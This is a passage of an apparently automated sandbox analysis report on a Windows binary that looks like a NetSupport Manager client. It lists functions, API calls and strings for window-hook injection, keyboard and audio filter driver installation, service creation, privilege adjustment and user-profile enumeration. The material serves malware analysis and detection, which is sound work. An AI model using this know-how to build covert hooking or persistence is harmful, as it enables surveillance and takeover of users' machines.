                                                                                                                        • GetGuiResources.USER32(00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00437
                                                                                                                        • wsprintfW.USER32 ref: 00B0046D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B00494
                                                                                                                        • wsprintfW.USER32 ref: 00B004A3
                                                                                                                        • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B004AF
                                                                                                                        • wsprintfW.USER32 ref: 00B004F7
                                                                                                                        • wsprintfW.USER32 ref: 00B00553
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,00B09820,?,..\CTL32\Refcount.cpp), ref: 00B00566
                                                                                                                        • wsprintfW.USER32 ref: 00B00602
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Current$MessageProcessThread$CountFileTickTime_strrchr$DebugDispatchErrorLastModuleNameOutputResourcesStringSystemTimesTranslateUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$ $%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$%d.$%ud %02uh %02um %02us$, error code %u (x%x)$, gdiHandles=%d$, runTime=$, thread=%s$, tid=%u (x%x)$.err$.exe$00h$00m$05/12/23 12:20:03 V14.10$Assert, tid=%x thread=%s exp=%s @ %hs:%d$File %hs, line %d%s%sBuild: %hs (%.17hs)Expression: %s$NOT copied to disk$Support\$copied to %s
                                                                                                                        • API String ID: 2334632915-3631277593
                                                                                                                        • Opcode ID: 267ff33305a43b38b5e672097d2a671d75d735e082842d9d8f1e6a52753f01a7
                                                                                                                        • Instruction ID: 96eb8395d132cdfab9fac67e3c5371445ad9217e2514505930600713e540fadf
                                                                                                                        • Opcode Fuzzy Hash: 267ff33305a43b38b5e672097d2a671d75d735e082842d9d8f1e6a52753f01a7
                                                                                                                        • Instruction Fuzzy Hash: EB522871E002199BCB24EF64CD55BEA77F8EF58300F0485D5EA0AA72D0EBB59E44CB94
                                                                                                                        Function 00B303E0 Relevance: 123.0, APIs: 49, Strings: 21, Instructions: 510libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000080), ref: 00B30411
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll,GetWindowBand), ref: 00B30437
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B3043E
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 00B3049B
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B30547
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B30560
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B3059B
                                                                                                                        • GetProcAddress.KERNEL32(?,MySetHook), ref: 00B305CB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadModuleNameProcwsprintf$ClassFileFolderHandleLocalPathTime_mallocwvsprintf
                                                                                                                        • String ID: Found SM, SimulateWinKey (to dismiss)$GetWindowBand$HookForBlank(%x, %s, %x)$Injecting...$Loaded %s$MySetHook$MyUnhook$NSMBlank_%p$NSMViewPaused$Shell_TrayWnd$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s$WaitSM$\NSL\$band=2$bound$nothing to do$user32.dll$winsthooks.dll
                                                                                                                        • API String ID: 2003708542-315793285
                                                                                                                        • Opcode ID: 5ac75b58abf2770826bafc254682a7e9a61fa5c339903c7702e28e551eb98b0d
                                                                                                                        • Instruction ID: 4eab3e22188e928dff1e48469a04107ca7839cf5f0947f113cb0b163b69cf983
                                                                                                                        • Opcode Fuzzy Hash: 5ac75b58abf2770826bafc254682a7e9a61fa5c339903c7702e28e551eb98b0d
                                                                                                                        • Instruction Fuzzy Hash: 3C1203B19103199BDB30AB64DC95BAA73F8EF44704F1041E4E60DA72D2EBB49E84CF65
                                                                                                                        Function 00B1A860 Relevance: 105.4, APIs: 9, Strings: 51, Instructions: 361libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B1A8BC
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00B1A8D5
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00B1A900
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B1A909
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetProductInfo,Microsoft ), ref: 00B1AA1F
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B1AA22
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc$Version_memset
                                                                                                                        • String ID: (build %d)$, 32-bit$, 64-bit$Advanced Server$Business Edition$Cluster Server Edition$Compute Cluster Edition$Datacenter Edition$Datacenter Edition (core installation)$Datacenter Edition for Itanium-based Systems$Datacenter Server$Datacenter x64 Edition$Enterprise Edition$Enterprise Edition (core installation)$Enterprise Edition for Itanium-based Systems$Enterprise x64 Edition$GetNativeSystemInfo$GetProductInfo$Home Basic Edition$Home Edition$Home Premium Edition$Microsoft $Professional$Server$Small Business Server$Small Business Server Premium Edition$Standard Edition$Standard Edition (core installation)$Standard x64 Edition$Starter Edition$Ultimate Edition$Web Edition$Web Server Edition$Windows 10 $Windows 2000 $Windows 7 $Windows 8 $Windows 8.1 $Windows Home Server$Windows Server 2003 R2, $Windows Server 2003, $Windows Server 2008 $Windows Server 2008 R2 $Windows Server 2012 $Windows Server 2012 R2 $Windows Server 2016 $Windows Storage Server 2003$Windows Vista $Windows XP $Windows XP Professional x64 Edition$kernel32.dll
                                                                                                                        • API String ID: 1659045089-3593436524
                                                                                                                        • Opcode ID: 9cdd5c1309bb6f0bde5be81e7fb03a67b5e3e27a5e7074f7ead35a1d53632b57
                                                                                                                        • Instruction ID: 0613772da311539ecb4e85d8176f53a24e87a5aa7e1df72e902d6a44afc13ae3
                                                                                                                        • Opcode Fuzzy Hash: 9cdd5c1309bb6f0bde5be81e7fb03a67b5e3e27a5e7074f7ead35a1d53632b57
                                                                                                                        • Instruction Fuzzy Hash: 91C1E830B5A354EACF7096148E52FEE76E5DF41700F9080DBE44EB61D1CAB06AC5DA93
                                                                                                                        Function 00B280C0 Relevance: 89.7, APIs: 35, Strings: 16, Instructions: 497serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,5E06C67B), ref: 00B280FA
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2810C
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F01FF), ref: 00B28134
                                                                                                                        • GetLastError.KERNEL32 ref: 00B28146
                                                                                                                        • OpenServiceW.ADVAPI32(?,PCISys,000F0003), ref: 00B285BE
                                                                                                                        • GetLastError.KERNEL32 ref: 00B285CA
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2868E
                                                                                                                        • OpenSCManagerW.ADVAPI32(?,?,000F003F), ref: 00B286F5
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2876A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastOpen$Service$Manager$CloseHandleLoadStringwvsprintf
                                                                                                                        • String ID: /u /ex$Attempting to restart audio$Deleting %s$ImagePath$IsA()$PCISys$Remove Audio ret %d, e=%d$Remove nskbfltr ret %d$Removing nskblftr$SYSTEM\CurrentControlSet\Services\%s$\inv$\inv\$\inv\*.bin$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h$nskbfltr$restart audio ret %d
                                                                                                                        • API String ID: 3309688422-3552944703
                                                                                                                        • Opcode ID: a84ae25da0effaff13918b0e537a2a574d8e47d57e6e0f6a50ad74a2528b473f
                                                                                                                        • Instruction ID: ac2b97c607ce592c35b019785ffd3a496c988aa44e2e49fd16811445e23b156a
                                                                                                                        • Opcode Fuzzy Hash: a84ae25da0effaff13918b0e537a2a574d8e47d57e6e0f6a50ad74a2528b473f
                                                                                                                        • Instruction Fuzzy Hash: 2702B3719012259BEB20EB64EC85BAA77F8EF64704F0041E4F90DA72D2EF745E85CB61
                                                                                                                        Function 00B2B310 Relevance: 81.0, APIs: 23, Strings: 23, Instructions: 518serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 00B2B389
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2B39B
                                                                                                                          • Part of subcall function 00B280C0: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,5E06C67B), ref: 00B280FA
                                                                                                                          • Part of subcall function 00B280C0: GetLastError.KERNEL32 ref: 00B2810C
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B2B3E9
                                                                                                                        • wsprintfW.USER32 ref: 00B2B418
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2B4C7
                                                                                                                        • OpenServiceW.ADVAPI32(?,00000000,000F0003), ref: 00B2B4E6
                                                                                                                        • QueryServiceConfigW.ADVAPI32(00000000,?,00000400,?), ref: 00B2B50A
                                                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B2B53F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B2B557
                                                                                                                        • CreateServiceW.ADVAPI32(?,00000000,00000000,000F01FF,-000000FF,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00B2B5BF
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2B5CB
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2B5F9
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2B617
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2B676
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000EE), ref: 00B2B71C
                                                                                                                        • OpenSCManagerW.ADVAPI32(?,?,000F003F), ref: 00B2B770
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ErrorLastManagerwsprintf$Configwvsprintf$ChangeCreateDirectoryLoadLocalQueryStringSystemTime_malloc
                                                                                                                        • String ID: "%s%s" /* $%s created ok$%s not created, already exists$/utc *$Attempting to restart audio$C:\Windows\Installer\$DisableDriver$ImagePath$Install Audio ret %d, e=%d$InstallService (showonly=%d, tutor=%d)$Installing %s$Installing nskbfltr ret %d$SYSTEM\CurrentControlSet\Services\nsafltr\Parameters$SYSTEM\CurrentControlSet\services\nskbfltr$\??\$\SystemRoot\system32\drivers\nskbfltr.sys$\drivers\nsafltr.sys$\drivers\nskbfltr.sys$client32 service re-enabled$existing client32 service is disabled$not creating client32, already installed$nskbfltr$restart audio ret %d
                                                                                                                        • API String ID: 670851042-4099431734
                                                                                                                        • Opcode ID: 9c28bbdd60b83793fa2d59a46fcfdac6c04f0a316136be055a55bb05d10e0dc6
                                                                                                                        • Instruction ID: 79c64dc6e3519746e5c60f10ca81667238f837614f4b8b43c0aa278409131a62
                                                                                                                        • Opcode Fuzzy Hash: 9c28bbdd60b83793fa2d59a46fcfdac6c04f0a316136be055a55bb05d10e0dc6
                                                                                                                        • Instruction Fuzzy Hash: D702C271900264ABDB20AB60ED46FAA77E8EF10705F0445E4F91DB72D2EFB45E44CB62
                                                                                                                        Function 00AFF4C0 Relevance: 77.4, APIs: 24, Strings: 20, Instructions: 400libraryregistryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • LoadLibraryW.KERNEL32(USER32), ref: 00AFF4FB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 00AFF518
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AFF525
                                                                                                                        • _memset.LIBCMT ref: 00AFF54C
                                                                                                                        • EnumDisplaySettingsW.USER32(00000000,000000FF,?), ref: 00AFF56B
                                                                                                                        • _memset.LIBCMT ref: 00AFF595
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AFF5CC
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AFF5E4
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00AFF61F
                                                                                                                        • _wcschr.LIBCMT ref: 00AFF69F
                                                                                                                        • _wcschr.LIBCMT ref: 00AFF6C7
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000002,?,?), ref: 00AFF745
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00AFF76B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$__wcsicoll_memset_wcschrwsprintf$AddressCreateDisplayEnumLoadLocalProcSettingsTime_mallocwvsprintf
                                                                                                                        • String ID: After cds, code0=%d$After cds2$Attach.RelativeX$Attach.RelativeY$Attach.ToDesktop$Before cds0$Before cds1$Before cds2$ChangeDisplaySettingsExW$EnableMirror(%d,%d)$EnumDisplayDevicesW$Error x%x opening %s$Error: Unknown devkey fmt %s from EnumDisplayDevices$Error: gdihook5 not found in EnumDisplayDevices$USER32$\CONTROL\VIDEO$\SERVICES$gdihook5$gdihook5$pci gdihook5
                                                                                                                        • API String ID: 287119285-1831013005
                                                                                                                        • Opcode ID: 7269f9ebe7e1721377a792b56945c535b57003c98291889f07b651a6cd6acba5
                                                                                                                        • Instruction ID: 132773e95d37d7fbb0a010d9f04996f23bb96557374edba8e459edf411cd7361
                                                                                                                        • Opcode Fuzzy Hash: 7269f9ebe7e1721377a792b56945c535b57003c98291889f07b651a6cd6acba5
                                                                                                                        • Instruction Fuzzy Hash: DCD1CB71E003195BDB21ABA49C96FBA73B8EF54740F0041E9FA0DA7291EEB49B44CF51
                                                                                                                        Function 00B21080 Relevance: 42.5, APIs: 7, Strings: 17, Instructions: 474libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedIncrement.KERNEL32(00B8C2E0), ref: 00B210B6
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES_300.DLL,00000000,00000002,NSMRES_300.DLL,NSMRES_300.DLL,NSMRES_300.DLL,NSMRES_300.DLL), ref: 00B211B4
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES_250.DLL,00000000,00000002,NSMRES_250.DLL,NSMRES_250.DLL,NSMRES_250.DLL), ref: 00B21296
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES_200.DLL,00000000,00000002,NSMRES_200.DLL,NSMRES_200.DLL,NSMRES_200.DLL), ref: 00B21378
                                                                                                                        • LoadLibraryExW.KERNEL32(NSSRESDM_150.DLL,00000000,00000002,NSSRESDM_150.DLL,NSSRESDM_150.DLL,NSSRESDM_150.DLL), ref: 00B21478
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES_125.DLL,00000000,00000002,NSMRES_125.DLL,NSMRES_125.DLL,NSMRES_125.DLL), ref: 00B21557
                                                                                                                        • LoadLibraryExW.KERNEL32(NSMRES.DLL,00000000,00000002,NSMRES.DLL,NSMRES.DLL,NSMRES.DLL,NSMRES.DLL), ref: 00B21656
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$IncrementInterlocked
                                                                                                                        • String ID: ..\CTL32\util.cpp$NSMRES.DLL$NSMRESDM_150.DLL$NSMRES_125.DLL$NSMRES_150.DLL$NSMRES_200.DLL$NSMRES_250.DLL$NSMRES_300.DLL$NSSRES.DLL$NSSRESDM_150.DLL$NSSRES_125.DLL$NSSRES_150.DLL$NSSRES_200.DLL$NSSRES_250.DLL$NSSRES_300.DLL$dpi != -1$x
                                                                                                                        • API String ID: 4104599539-1743827446
                                                                                                                        • Opcode ID: 56e7197a881f5add527ccf6924881e412aea2bf09131e9a33bc3816febe1f16c
                                                                                                                        • Instruction ID: 1c3ad56e0259158428e96ac598e4b605907bbc51af6bdd036176c2bb2b72e878
                                                                                                                        • Opcode Fuzzy Hash: 56e7197a881f5add527ccf6924881e412aea2bf09131e9a33bc3816febe1f16c
                                                                                                                        • Instruction Fuzzy Hash: 5702E6B2D00205DBCB10EFECD845ADEB7F5EF55314F14CAA8E529A72A0D7749A04CBA1
                                                                                                                        Function 00B10C40 Relevance: 28.4, APIs: 10, Strings: 6, Instructions: 360fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 00B10D4E
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B10D6C
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B10DF9
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B10E08
                                                                                                                        • FindFirstFileW.KERNEL32(c:\users\*.*,?), ref: 00B10E38
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B10F04
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B10F2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$First$__wcsicoll$CloseNext
                                                                                                                        • String ID: IsA()$c:\users\%s\AppData\Local\VirtualStore\%s$c:\users\%s\AppData\Roaming\%s$c:\users\*.*$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h$sysinfo.scp
                                                                                                                        • API String ID: 2775747024-3491454298
                                                                                                                        • Opcode ID: f0d71c69fc516ff1b844ab4af8f0619f3ca7e103f23cc461f4c2eace73289308
                                                                                                                        • Instruction ID: 88620b4f8cc5b809bee41bfb3188d2488e96e1890121e708354c9c2568a249d6
                                                                                                                        • Opcode Fuzzy Hash: f0d71c69fc516ff1b844ab4af8f0619f3ca7e103f23cc461f4c2eace73289308
                                                                                                                        • Instruction Fuzzy Hash: D8D1DF75D002199BDB20EB58DC55BEAB3B9EF94300F0046D8E909A3291EB756FD5CFA0
                                                                                                                        Function 00B222C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00B22303
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00B2230A
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 00B22321
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00B2234D
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 00B2236D
                                                                                                                        • _malloc.LIBCMT ref: 00B22376
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 00B2239A
                                                                                                                        • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,?), ref: 00B223DC
                                                                                                                        • _free.LIBCMT ref: 00B2240A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2241F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
